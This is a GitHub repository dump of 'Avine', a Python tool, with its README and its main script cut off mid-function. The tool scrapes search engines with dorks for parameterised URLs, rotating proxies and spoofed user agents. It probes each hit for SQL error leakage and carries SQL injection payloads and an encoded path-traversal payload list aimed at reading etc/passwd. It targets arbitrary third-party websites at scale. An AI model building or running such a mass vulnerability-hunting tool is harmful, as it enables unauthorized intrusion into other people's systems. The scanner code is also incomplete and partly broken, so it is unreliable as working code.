├── README.md ├── avine.py ├── pictures ├── engines.png ├── login.png ├── modules.png ├── parser.png └── sqliscan.png ├── requirements.txt └── results └── results here.txt /README.md: -------------------------------------------------------------------------------- 1 | # Avine 2 | Avine is an unfinished SQL/dorking tool I made in Python. A lot of things were never finished because I'm working on a C# version. If anyone is interested in contributing to Avine, message me on Discord: KillinMachine#2570. There will not be any updates as of now. The vulnerability scanner does not work. Some engines of the dork parser do work. I just wanted to release this for people to use if they really need something and to learn how it works. Excuse my messy code and some questionable ways I did things. 3 | 4 | ### Download exe [Here](https://github.com/MachineKillin/Avine/releases/download/v1.0.1/avine.zip) 5 | 6 | ## About 7 | Avine is a Python dork parser with a proxy scraper and SQL/LFI scanner. The scanners do not work but can be fixed. This program was going to be sold, which is why there is a login screen. I did not want to sell the Python version due to it being slow. **Please do give credit if you use my code anywhere!** 8 | 9 | ## Help 10 | For help, join my Discord server [Avine Discord](https://discord.gg/bFUKufJp6X) or [Github Discord](https://discord.com/invite/JcAvQc797r) 11 | 12 | ## Installing 13 | ``` 14 | git clone https://github.com/MachineKillin/Avine 15 | cd avine 16 | pip install -r requirements.txt 17 | python3 avine.py 18 | ``` 19 | 20 | ## Pictures 21 | ![](pictures/parser.png) 22 | ![](pictures/sqliscan.png) 23 | ![](pictures/engines.png) 24 | ![](pictures/modules.png) 25 | ![](pictures/login.png) 26 | -------------------------------------------------------------------------------- /avine.py: -------------------------------------------------------------------------------- 1 | from itertools import count 2 | from operator import truediv 3 | import os, time, ctypes, urllib3, requests, datetime, tkinter, threading, random, urllib.parse, re, subprocess, hmac, subprocess, hashlib, json, sys 4 | from weakref import proxy 5 | from colorama import init, Fore 6 | from tkinter import filedialog 7 | from bs4 import BeautifulSoup 8 | root = tkinter.Tk() 9 | root.withdraw() 10 | dorklist = [] 11 | e = datetime.datetime.now() 12 | current_date = e.strftime("%Y-%m-%d-%H-%M-%S") 13 | filetypes = ( ('Text Files', '*.txt'), ('All Files', '.')) 14 | hardwareid = subprocess.check_output('wmic csproduct get uuid').decode().split('\n')[1].strip() 15 | badlinks = [ 16 | 'https://bing', 17 | 'https://wikipedia', 18 | 'https://stackoverflow', 19 | 'https://amazon', 20 | 'https://google', 21 | 'https://microsoft', 22 | 'https://youtube', 23 | 'https://reddit', 24 | 'https://quora', 25 | 'https://telegram', 26 | 'https://msdn', 27 | 'https://facebook', 28 | 'https://apple', 29 | 'https://twitter', 30 | 'https://instagram', 31 | 'https://cracked', 32 | 'https://nulled', 33 | 'https://yahoo', 34 | 'https://gbhackers', 35 | 'https://github', 36 | 'https://www.google', 37 | 'https://docs.microsoft', 38 | 'https://sourceforge', 39 | 'https://sourceforge.net', 40 | 'https://stackoverflow.com', 41 | 'https://www.facebook', 42 | 'https://www.bing', 43 | 'https://www.bing.com', 44 | 'https://www.bing.com/ck/a?!&&p=', 45 | 'https://bing', 46 | 'https://wikipedia', 47 | 'https://stackoverflow', 48 | 'https://amazon', 49 | 'https://google', 50 | 'https://microsoft', 51 | 'https://youtube', 52 | 'https://reddit', 53 | 'https://quora', 54 |
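# NOTE: the entries from 'https://bing' through 'https://www.bing.com/ck/a?!&&p=' above are repeated in the next block of this list; the duplicates are harmless for the membership checks done later in parse(), but the list could be pruned.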
'https://telegram', 55 | 'https://msdn', 56 | 'https://facebook', 57 | 'https://apple', 58 | 'https://twitter', 59 | 'https://instagram', 60 | 'https://cracked', 61 | 'https://nulled', 62 | 'https://yahoo', 63 | 'https://gbhackers', 64 | 'https://github', 65 | 'https://www.google', 66 | 'https://docs.microsoft', 67 | 'https://sourceforge', 68 | 'https://sourceforge.net', 69 | 'https://stackoverflow.com', 70 | 'https://www.facebook', 71 | 'https://www.bing', 72 | 'https://www.bing.com', 73 | 'https://www.bing.com/ck/a?!&&p=', 74 | 'https://search.aol.com', 75 | 'https://search.aol', 76 | 'https://r.search.yahoo.com', 77 | 'https://r.search.yahoo', 78 | 'https://www.google.com', 79 | 'https://www.google', 80 | 'https://www.youtube.com', 81 | 'https://yabs.yandex.ru', 82 | 'https://www.ask.com', 83 | 'https://www.bing.com/search?q=', 84 | 'https://papago.naver.net', 85 | 'https://papago.naver' 86 | ] #filteres any likes with these in it 87 | headerz = [ 88 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0'}, 89 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:77.0) Gecko/20100101 Firefox/77.0'}, 90 | {'User-Agent' : 'Mozilla/5.0 (X11; Linux ppc64le; rv:75.0) Gecko/20100101 Firefox/75.0'}, 91 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/75.0'}, 92 | {'User-Agent' : 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.10; rv:75.0) Gecko/20100101 Firefox/75.0'}, 93 | {'User-Agent' : 'Mozilla/5.0 (X11; Linux; rv:74.0) Gecko/20100101 Firefox/74.0'}, 94 | {'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/73.0'}, 95 | {'User-Agent' : 'Mozilla/5.0 (X11; OpenBSD i386; rv:72.0) Gecko/20100101 Firefox/72.0'}, 96 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:71.0) Gecko/20100101 Firefox/71.0'}, 97 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:70.0) Gecko/20191022 Firefox/70.0'}, 98 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:70.0) Gecko/20190101 Firefox/70.0'}, 99 | {'User-Agent' : 'Mozilla/5.0 (Windows; U; Windows NT 9.1; en-US; rv:12.9.1.11) Gecko/20100821 Firefox/70'}, 100 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:69.2.1) Gecko/20100101 Firefox/69.2'}, 101 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; rv:68.7) Gecko/20100101 Firefox/68.7'}, 102 | {'User-Agent' : 'Mozilla/5.0 (X11; Linux i686; rv:64.0) Gecko/20100101 Firefox/64.0'}, 103 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582'}, 104 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19577'}, 105 | {'User-Agent' : 'Mozilla/5.0 (X11) AppleWebKit/62.41 (KHTML, like Gecko) Edge/17.10859 Safari/452.6'}, 106 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931'}, 107 | {'User-Agent' : 'Chrome (AppleWebKit/537.1; Chrome50.0; Windows NT 6.3) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'}, 108 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.9200'}, 109 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586'}, 110 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'}, 111 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'}, 112 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'}, 113 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'}, 114 | {'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'}, 115 | {'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'}] #wow even more headers 116 | Results = [] 117 | GoodList = [] 118 | Total_Found = 0 119 | Valid = 0 120 | antipublic = 0 121 | Duplicates = 0 122 | Total = 0 123 | Error = 0 124 | ProxyError = 0 125 | proxylist = [] 126 | urllist = [] 127 | droklist = [] 128 | dorklina = [] 129 | dorkparse = 0 130 | threadn = 0 131 | counter = 0 132 | dupe = 0 133 | MySQL = 0 134 | MsSQL = 0 135 | PostGRES = 0 136 | Oracle = 0 137 | MariaDB = 0 138 | Nonee = 0 139 | Errorr = 0 140 | sqls = 0 141 | refresh = 0 142 | linee = 0 143 | badprox = 0 144 | first = 0 145 | askcount = 0 146 | vulnerable = 0 147 | nonvulnerable = 0 148 | savepayload = "false" 149 | lfi = 0 150 | scan = 0 151 | sqli = 0 152 | invalidurl = 0 153 | # this looks stupid 154 | init() 155 | blue, red, lightred, white, green, cyan, lightblue, reset, magenta, lightmagenta, lightcyan, yellow = Fore.BLUE, Fore.RED, Fore.LIGHTRED_EX, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.LIGHTBLUE_EX, Fore.RESET, Fore.MAGENTA, Fore.LIGHTMAGENTA_EX, Fore.LIGHTCYAN_EX, Fore.YELLOW 156 | #it took me forever to make this logo 157 | logo = f''' 158 | {cyan}╭───────────────────────────────────────────────────╮ 159 | {cyan}│ {lightcyan} ▄▀▀{cyan}█▄ {lightcyan} ▄▀▀{cyan}▄ {lightcyan}▄▀▀{cyan}▄ {lightcyan}▄{cyan}▀▀█▀{lightcyan}▄ ▄▀▀{cyan}▄ {lightcyan}▀{cyan}▄ {lightcyan}▄▀▀{cyan}█▄▄▄▄ {cyan}│ 160 | {cyan}│ {lightcyan}▐ {cyan}▄▀ ▀▄ {lightcyan}█ {cyan}█ █ {lightcyan}█ {cyan}█ {lightcyan}█ █ {cyan}█ █ █{lightcyan} ▐ {cyan}█ {lightcyan}▐ {cyan}│ 161 | {cyan}│ {cyan} █▄▄▄█ {lightcyan}▐ {cyan} █ █ {lightcyan}▐ {cyan}█ {lightcyan} ▐ ▐ {cyan} █ ▀█ █▄▄▄▄▄ {cyan}│ 162 | {cyan}│ {lightcyan} ▄{cyan}▀ █ █ ▄▀ █ █ █ █ ▌ {cyan}│ 163 | {cyan}│ {lightcyan}█ ▄▀ {cyan}▀▄▀ {lightcyan}▄{cyan}▀▀▀▀▀{lightcyan}▄ ▄▀ █ ▄{cyan}▀▄▄▄▄ {cyan}│ 164 | {cyan}│ {lightcyan}▐ ▐ █ █ █ ▐ █ ▐ {cyan}│ 165 | {cyan}│ {lightcyan} ▐ ▐ ▐ ▐ {cyan}│ 166 | {cyan}╰───────────────────────────────────────────┨{magenta}AVINE{cyan}┠─╯''' 167 | 168 | def sql(link): #this works 169 | global MySQL, MsSQL, PostGRES, Oracle, MariaDB, Nonee, Errorr, sqls 170 | check = "'" 171 | try: 172 | checker = requests.post(link + check) 173 | if "MySQL" in checker.text: 174 | MySQL+=1 175 | sqls+=1 176 | elif "native client" in checker.text: 177 | MsSQL+=1 178 | sqls+=1 179 | elif "syntax error" in checker.text: 180 | PostGRES+=1 181 | sqls+=1 182 | elif "ORA" in checker.text: 183 | Oracle+=1 184 | sqls+=1 185 | elif "MariaDB" in checker.text: 186 | MariaDB+=1 187 | sqls+=1 188 | elif "You have an error in your SQL syntax;" in checker.text: 189 | sqls+=1 190 | Nonee+=1 191 | except: 192 | Errorr+=1 193 | 194 | def lfiscan(): #never finished this lmfao 195 | global lfi_win, nonvulnerable, lfi, scan, Errorr, counter, linee 196 | counter+=1 197 | scan+=1 198 | if scan < len(urllist): 
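# The sql() helper above does simple error-based fingerprinting: it appends a single quote to the URL and looks for
# DBMS-specific error strings ("MySQL", "native client", "syntax error", "ORA", "MariaDB") in the response body.
# A minimal standalone sketch of the same idea (assuming requests is already imported, as it is at the top of this file):
#
#     resp = requests.post(url + "'", timeout=10)
#     if any(sig in resp.text for sig in ("MySQL", "native client", "syntax error", "ORA", "MariaDB")):
#         print("possible SQL error leakage:", url)
#
# Also note that lfiscan() below re-reads the selected URL file and spawns a new thread for every URL it processes,
# so large URL lists will open the file many times.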
199 | linee+=1 200 | with open(fileNameUrl.name, 'r+', encoding='utf-8', errors='ignore') as e: 201 | ext = e.readlines() 202 | url = ext[int(linee)].strip() 203 | ctypes.windll.kernel32.SetConsoleTitleW(f"Avine By KillinMachine#2570 | LFI Vulnerability Scanner {scan}/{len(urllist)} | Vulnerable Urls: {lfi} | Errors: {Errorr}") 204 | if counter > 30: 205 | os.system('cls') 206 | print(logo) 207 | print() 208 | print(f"{magenta} Scanning Your Urls For LFI Vulnerabilities!") 209 | print(f" {lightblue}Progress: {yellow}[{cyan}{scan}/{len(urllist)}{yellow}]{reset}") 210 | print(f" {lightblue}Vulnerable: {yellow}[{cyan}{lfi}{yellow}]{reset}") 211 | print(f" {lightblue}Errors: {yellow}[{cyan}{Errorr}{yellow}]{reset}") 212 | print(f" {lightblue}Url: {yellow}[{cyan}{url}{yellow}]{reset}") 213 | counter = 0 214 | try: 215 | lfiscanner(url) 216 | except: 217 | Errorr+=1 218 | threading.Thread(target=lfiscan, args=()).start() 219 | if scan == len(urllist): 220 | print(logo) 221 | print() 222 | print(f"{magenta} Scanning Finished!") 223 | print() 224 | print(f"{lightblue}Vulnerable Urls: {yellow}[{cyan}{lfi}{yellow}]{reset}") 225 | time.sleep(3) 226 | main2() 227 | 228 | def lfiscanner(url): #again dont work never finished working on it 229 | global lfi_win, nonvulnerable, lfi, Errorr 230 | dot_list = [] 231 | slash_list = [] 232 | lfi_win = [] 233 | pre_dot_list = ['..', '..%00', '%2e%2e', '%5C..', '.%2e', '%2e.', '%c0%6e%c0%6e', '%252e%252e', '%c0%2e%c0%2e', '%c0%5e%c0%5e', '%%32%%65%%32%%65', '%e0%90%ae%e0%90%ae', '%25c0%25ae%25c0%25ae', '%f0%80%80%ae%f0%80%80%ae', '%fc%80%80%80%80%ae%fc%80%80%80%80%ae'] 234 | pre_slash_list = ['/', '\\', '%2f', '%5c', '%252f', '%255c', '%c0%2f', '%c0%af', '%c0%5c', '%c1%9c', '%c1%af', '%c1%8s', '%bg%qf', '%u2215', '%u2216', '%uEFC8', '%%32%%66', '%%35%%63', '%25c1%259c', '%25c0%25af', '%f8%80%80%80%af', '%f0%80%80%af'] 235 | for i in range(len(pre_dot_list)): 236 | dot_list.append(pre_dot_list[i].strip()) 237 | for i in range(len(pre_slash_list)): 238 | slash_list.append(pre_slash_list[i].strip()) 239 | goal = r"etc/passwd" 240 | succeed = 0 241 | for dot in dot_list: 242 | if succeed == 1: 243 | break 244 | for slash in slash_list: 245 | if succeed == 1: 246 | break 247 | for i in range(1, 5): 248 | if succeed == 1: 249 | break 250 | if i == 1: 251 | payload = dot+slash+goal 252 | if i == 2: 253 | payload = dot+slash+dot+slash+goal 254 | if i == 3: 255 | payload = dot+slash+dot+slash+dot+slash+goal 256 | if i == 4: 257 | payload = dot+slash+dot+slash+dot+slash+dot+slash+goal 258 | if i == 5: 259 | payload = dot+slash+dot+slash+dot+slash+dot+slash+dot+slash+goal 260 | check = requests.get(url+payload) 261 | if ("root:") in check.text: 262 | succeed = 1 263 | win_payload = payload 264 | lfi+=1 265 | lfi_win.append(win_payload) 266 | with open(r'results/lfi.txt', 'a') as File: 267 | if savepayload == "true": 268 | File.write(url) + File.write(f" | {win_payload}") + File.write('\n') 269 | if savepayload == "false": 270 | File.write(url) + File.write('\n') 271 | break 272 | else: 273 | nonvulnerable+=1 274 | 275 | def vulnscan(): #broken asf i got distracted while working on this f 276 | global vulnerable, nonvulnerable, savepayload, scan, Errorr, counter, linee, invalidurl 277 | scan+=1 278 | counter+=1 279 | if scan < len(urllist): 280 | linee+=1 281 | with open(fileNameUrl.name, 'r+', encoding='utf-8', errors='ignore') as e: 282 | ext = e.readlines() 283 | url = ext[int(linee)].strip() 284 | ctypes.windll.kernel32.SetConsoleTitleW(f"Avine By KillinMachine#2570 | 
SQLI Vulnerability Scanner {scan}/{len(urllist)} | Vulnerable Urls: {vulnerable} | Invalid Url's: {invalidurl} | Errors: {Errorr}") 285 | if counter > 2: 286 | os.system('cls') 287 | print(logo) 288 | print() 289 | print(f"{magenta} Scanning Your Urls For SQLI Vulnerabilities!") 290 | print(f" {lightblue}Progress: {yellow}[{cyan}{scan}/{len(urllist)}{yellow}]{reset}") 291 | print(f" {lightblue}Vulnerable: {yellow}[{cyan}{vulnerable}{yellow}]{reset}") 292 | print(f" {lightblue}Errors: {yellow}[{cyan}{Errorr}{yellow}]{reset}") 293 | print(f" {lightblue}Url: {yellow}[{cyan}{url}{yellow}]{reset}") 294 | counter = 0 295 | try: 296 | sqliscanner(url) 297 | except Exception as r: 298 | Errorr+=1 299 | print(r) 300 | time.sleep(2) 301 | threading.Thread(target=vulnscan, args=()).start() 302 | if scan == len(urllist): 303 | print(logo) 304 | print() 305 | print(f"{magenta} Scanning Finished!") 306 | print() 307 | print(f"{lightblue}Vulnerable Urls: {yellow}[{cyan}{vulnerable}{yellow}]{reset}") 308 | time.sleep(3) 309 | main2() 310 | 311 | def sqliscanner(url): #never finished 312 | global vulnerable, nonvulnerable, savepayload, invalidurl, scan 313 | try: 314 | f = url.split('=')[0] 315 | r = url.split('=')[1] 316 | eq = '=' 317 | payloads = ["'", '"', "`", "/'/", "'||'asd'||'", "'or'1'='1", "+or+1=1", "'or''='", ')', "')"] 318 | error_list = ["You have an error in your SQL syntax","error in your SQL syntax","mysql_numrows()","Input String was not in a correct format","mysql_fetch","num_rows","Error Executing Database Query","Unclosed quotation mark","Error Occured While Processing Request","Server Error","Microsoft OLE DB Provider for ODBC Drivers Error","Invalid Querystring","VBScript Runtime","Syntax Error","GetArray()","FetchRows()","executeQuery","mysql_fetch_array()"] 319 | for payload in payloads: 320 | pattern = r"http\S+" 321 | query = f + eq + r + payload 322 | try: 323 | content = requests.get(url).text 324 | content_urless = re.sub(pattern, "", content) 325 | new_content = requests.get(query).text 326 | new_content_urless = re.sub(pattern, "", new_content) 327 | if content_urless != new_content_urless and str(error_list) not in new_content_urless: 328 | nonvulnerable+=1 329 | elif str(error_list) in new_content_urless: 330 | vulnerable+=1 331 | scan+=1 332 | with open(r'results/sqli.txt', 'a') as File: 333 | if savepayload == "true": 334 | File.write(url) + File.write(f" | {payload}") + File.write('\n') 335 | if savepayload == "false": 336 | File.write(url) + File.write('\n') 337 | else: 338 | nonvulnerable+=1 339 | scan+=1 340 | except: 341 | invalidurl+=1 342 | scan+=1 343 | except: 344 | invalidurl+=1 345 | scan+=1 346 | 347 | def proxy(): #proxies like are so slow unless u got good ones so yea 348 | global ProxyError, proxies 349 | if proxytype == "https": 350 | try: 351 | RandomProxy = random.choice(proxylist) 352 | proxy = RandomProxy.split(':') 353 | if len(proxy) == 2: 354 | proxies = {'https': f'https://{RandomProxy}','http': f'http://{RandomProxy}'} 355 | elif len(proxy) == 4: 356 | proxies = {'https': f'https://{proxy[2]}:{proxy[3]}@{proxy[0]}:{proxy[1]}','http': f'http://{proxy[2]}:{proxy[3]}@{proxy[0]}:{proxy[1]}'} 357 | else: 358 | proxylist.remove(RandomProxy) 359 | except: 360 | ProxyError+=1 361 | if proxytype == "socks4": 362 | try: 363 | RandomProxy = random.choice(proxylist) 364 | proxy = RandomProxy.split(':') 365 | if len(proxy) == 2: 366 | proxies = {'https': f'socks4://{RandomProxy}','http': f'socks4://{RandomProxy}'} 367 | elif len(proxy) == 4: 368 | proxies = 
{'https': f'socks4://{proxy[2]}:{proxy[3]}@{proxy[0]}:{proxy[1]}','http': f'socks4://{proxy[2]}:{proxy[3]}@{proxy[0]}:{proxy[1]}'} 369 | else: 370 | proxylist.remove(RandomProxy) 371 | except: 372 | ProxyError+=1 373 | if proxytype == "socks5": 374 | try: 375 | RandomProxy = random.choice(proxylist) 376 | proxy = RandomProxy.split(':') 377 | if len(proxy) == 2: 378 | proxies = {'https': f'socks5://{RandomProxy}','http': f'socks5://{RandomProxy}'} 379 | elif len(proxy) == 4: 380 | proxies = {'https': f'socks5://{proxy[2]}:{proxy[3]}@{proxy[0]}:{proxy[1]}','http': f'socks5://{proxy[2]}:{proxy[3]}@{proxy[0]}:{proxy[1]}'} 381 | else: 382 | proxylist.remove(RandomProxy) 383 | except: 384 | ProxyError+=1 385 | 386 | def parse(): #bossman part of the code 387 | global Total_Found, Valid, Duplicates, Error, dorklina, ProxyError, Total, dorkparse, threadn, counter, dupe, refresh, engine, searchengine, badprox, first, askcount 388 | if Total < dorklineint: 389 | try: 390 | ctypes.windll.kernel32.SetConsoleTitleW(f"Avine By KillinMachine#2570 | Parsed dorks = {Total} | Total Found Links = {Total_Found} | Duplicates = {Duplicates} | Valid Links = {Valid} | Retries = {ProxyError} | Error = {Error}") 391 | counter+=1 392 | dorkparse+=1 393 | refresh+=1 394 | if dorkparse == 10: 395 | if threadn < 1: 396 | askcount = 0 397 | first = 0 398 | dorkparse = 0 399 | badprox = 0 400 | Drok() 401 | Total += 1 402 | if dupe == 10: 403 | if threadn//dupe < 15: 404 | askcount = 0 405 | dupe = 0 406 | first = 0 407 | dorkparse = 0 408 | badprox = 0 409 | Drok() 410 | Total += 1 411 | if counter > 50: 412 | askcount = 0 413 | counter = 0 414 | dorkparse = 0 415 | badprox = 0 416 | first = 0 417 | Drok() 418 | Total += 1 419 | threadn = 0 420 | dorkparse = 0 421 | if counter == 4: #weird code right here but it fixed something at one point and idk if i even needed to do this idk its stupid 422 | searchengine = engine 423 | os.system('cls') 424 | ctypes.windll.kernel32.SetConsoleTitleW(f"Avine By KillinMachine#2570 | Parsed dorks = {Total} | Total Found Links = {Total_Found} | Duplicates = {Duplicates} | Valid Links = {Valid} | Retries = {ProxyError} | Error = {Error}") 425 | print(logo) 426 | print() #lmfao this the ui part 427 | print(f'''{magenta} Parsing Dorks!{reset} 428 | {lightblue}Search Engine: {yellow}[{cyan}{searchengine}{yellow}]{reset} 429 | {lightblue}File: {yellow}[{cyan}{fileNameDork.name}{yellow}]{reset} 430 | {lightblue}Dork: {yellow}[{cyan}{dorklia}{yellow}]{reset} 431 | {lightblue}Parsed Dork's: {yellow}[{cyan}{Total}{yellow}/{cyan}{dorklineint}{yellow}]{reset}''') 432 | try: 433 | print(f" {lightblue}Total Ratio: {yellow}[{cyan}1{yellow}:{cyan}{Total_Found//Total}{yellow}]{reset}") 434 | except: 435 | pass 436 | try: 437 | print(f" {lightblue}Valid Ratio: {yellow}[{cyan}1{yellow}:{cyan}{Total_Found//Valid}{yellow}]{reset}") 438 | except: 439 | pass 440 | print(f''' {lightblue}Total Link's: {yellow}[{cyan}{Total_Found}{yellow}]{reset} 441 | {lightblue}Duplicates: {yellow}[{cyan}{Duplicates}{yellow}]{reset} 442 | {lightblue}Valid Link's: {yellow}[{cyan}{Valid}{yellow}]{reset} 443 | {lightblue}Retries: {yellow}[{cyan}{ProxyError}{yellow}]{reset} 444 | {lightblue}Error's: {yellow}[{cyan}{Error}{yellow}]{reset} 445 | 446 | {magenta} SQL Links!{reset} 447 | {lightblue}MySQL: {yellow}[{cyan}{MySQL}{yellow}]{reset} 448 | {lightblue}MSSQL: {yellow}[{cyan}{MsSQL}{yellow}]{reset} 449 | {lightblue}PostGRES: {yellow}[{cyan}{PostGRES}{yellow}]{reset} 450 | {lightblue}Oracle: 
{yellow}[{cyan}{Oracle}{yellow}]{reset} 451 | {lightblue}MariaDB: {yellow}[{cyan}{MariaDB}{yellow}]{reset} 452 | {lightblue}None: {yellow}[{cyan}{Nonee}{yellow}]{reset} 453 | {lightblue}Error's: {yellow}[{cyan}{Errorr}{yellow}]{reset}''') 454 | refresh = 0 455 | proxy() 456 | if engine == "Bing": 457 | header = random.choice(headerz) 458 | first+=1 459 | url = f"https://www.bing.com/search?q={urllib.parse.quote(dorklia)}&first={first}" 460 | try: 461 | if proxytype != "Proxyless": 462 | response_2 = requests.get(url, headers=header, proxies=proxies, timeout=10) 463 | else: 464 | response_2 = requests.get(url, headers=header, timeout=10) 465 | soup = BeautifulSoup(response_2.text, 'html.parser') 466 | TagList = soup.find_all('h2') 467 | for tag in TagList: 468 | Body = tag.find_all('a') 469 | for Container in Body: 470 | link = Container['href'] 471 | try: 472 | link1 = link.split("/")[2] 473 | except: 474 | pass 475 | if "www.bing.com" in link1: 476 | r = requests.get(link) 477 | link = r.url 478 | try: 479 | link1 = link.split("/")[2] #tryna get fix the redirect link that bing gives should also do this for yahoo if ya want links 480 | except: 481 | pass 482 | if "www.bing.com" in link1: 483 | r = requests.get(link) 484 | link = r.url 485 | else: 486 | pass 487 | else: 488 | pass 489 | refresh+=1 490 | Total_Found += 1 491 | threadn+=1 492 | if link not in Results: 493 | dupe+=1 494 | Duplicates = Total_Found - Valid 495 | Results.append(link) 496 | linkhost = link.split('.com')[0] 497 | if linkhost not in badlinks: 498 | dupe = 0 499 | counter = 0 500 | if "=" in link: 501 | Valid += 1 502 | badlinks.append(link) 503 | with open(r'results/bing_links.txt', 'a') as File: 504 | File.write(link) + File.write('\n') 505 | sql(link) 506 | except: 507 | ProxyError += 1 508 | dorkparse = 0 509 | if engine == "Google": #yea dont work 510 | header = random.choice(headerz) 511 | first+=1 512 | url = f"https://www.google.com/search?q={urllib.parse.quote(dorklia)}&start={first*10}" 513 | try: 514 | if proxytype != "Proxyless": 515 | response_2 = requests.get(url, headers=header, proxies=proxies, timeout=10) 516 | else: 517 | response_2 = requests.get(url, headers=header, timeout=10) 518 | soup = BeautifulSoup(response_2.text, 'html.parser') 519 | for d in soup.find_all("div", class_="yuRUbf"): 520 | for a in d.find_all('a'): 521 | badprox = 0 522 | link = a['href'] 523 | Total_Found += 1 524 | threadn+=1 525 | if link not in Results: 526 | dupe+=1 527 | Duplicates = Total_Found - Valid 528 | Results.append(link) 529 | linkhost = link.split('.com')[0] 530 | if linkhost not in badlinks: 531 | dupe = 0 532 | counter = 0 533 | if '=' in link: 534 | Valid += 1 535 | badlinks.append(link) 536 | with open(r'results/google_links.txt', 'a') as File: 537 | File.write(link) + File.write('\n') 538 | sql(link) 539 | except: 540 | ProxyError+=1 541 | dorkparse = 0 542 | if engine == "Yahoo": 543 | header = random.choice(headerz) 544 | first+=1 545 | url = f"https://search.yahoo.com/search?p={urllib.parse.quote(dorklia)}&b={first*10}" 546 | try: 547 | if proxytype != "Proxyless": 548 | response_2 = requests.get(url, headers=header, proxies=proxies, timeout=10) 549 | else: 550 | response_2 = requests.get(url, headers=header, timeout=10) 551 | soup = BeautifulSoup(response_2.text, 'html.parser') 552 | for d in soup.find_all('h3', class_="title"): 553 | for a in d.find_all('a'): 554 | badprox = 0 555 | link = a['href'] 556 | Total_Found += 1 557 | threadn+=1 558 | if link not in Results: 559 | dupe+=1 560 | Duplicates = 
Total_Found - Valid 561 | Results.append(link) 562 | linkhost = link.split('.com')[0] 563 | if linkhost not in badlinks: 564 | dupe = 0 565 | counter = 0 566 | if '=' in link: 567 | Valid += 1 568 | badlinks.append(link) 569 | with open(r'results/yahoo_links.txt', 'a') as File: 570 | File.write(link) + File.write('\n') 571 | sql(link) 572 | except: 573 | ProxyError+=1 574 | dorkparse = 0 575 | if engine == "Ask": 576 | header = random.choice(headerz) 577 | askcount+=1 578 | if askcount == 20: 579 | first+=1 580 | askcount = 0 581 | url = f"https://www.ask.com/web?q={urllib.parse.quote(dorklia)}&page={first}" 582 | try: 583 | if proxytype != "Proxyless": 584 | response_2 = requests.get(url, headers=header, proxies=proxies, timeout=10) 585 | else: 586 | response_2 = requests.get(url, headers=header, timeout=10) 587 | soup = BeautifulSoup(response_2.text, 'html.parser') 588 | TagList = soup.find_all("div", class_="PartialSearchResults-item-title") 589 | for tag in TagList: 590 | Body = tag.find_all('a') 591 | for Container in Body: 592 | badprox = 0 593 | link = Container['href'] 594 | Total_Found += 1 595 | threadn+=1 596 | if link not in Results: 597 | dupe+=1 598 | Duplicates = Total_Found - Valid 599 | Results.append(link) 600 | linkhost = link.split('.com')[0] 601 | if linkhost not in badlinks: 602 | dupe = 0 603 | counter = 0 604 | if '=' in link: 605 | Valid += 1 606 | badlinks.append(link) 607 | with open(r'results/ask_links.txt', 'a') as File: 608 | File.write(link) + File.write('\n') 609 | sql(link) 610 | except: 611 | ProxyError+=1 612 | dorkparse = 0 613 | if engine == "Rambler": 614 | header = random.choice(headerz) 615 | first+=1 616 | url = f"https://nova.rambler.ru/search?utm_source=head&utm_campaign=self_promo&utm_medium=form&utm_content=search&query={urllib.parse.quote(dorklia)}&page={first}" 617 | try: 618 | if proxytype != "Proxyless": 619 | response_2 = requests.get(url, headers=header, proxies=proxies, timeout=10) 620 | else: 621 | response_2 = requests.get(url, headers=header, timeout=10) 622 | soup = BeautifulSoup(response_2.text, 'html.parser') 623 | TagList = soup.find_all('h3', class_="Serp__title--3MDnI") 624 | for tag in TagList: 625 | Body = tag.find_all('a') 626 | for Container in Body: 627 | badprox = 0 628 | link = Container['href'] 629 | Total_Found += 1 630 | threadn+=1 631 | if link not in Results: 632 | dupe+=1 633 | Duplicates = Total_Found - Valid 634 | Results.append(link) 635 | linkhost = link.split('.com')[0] 636 | 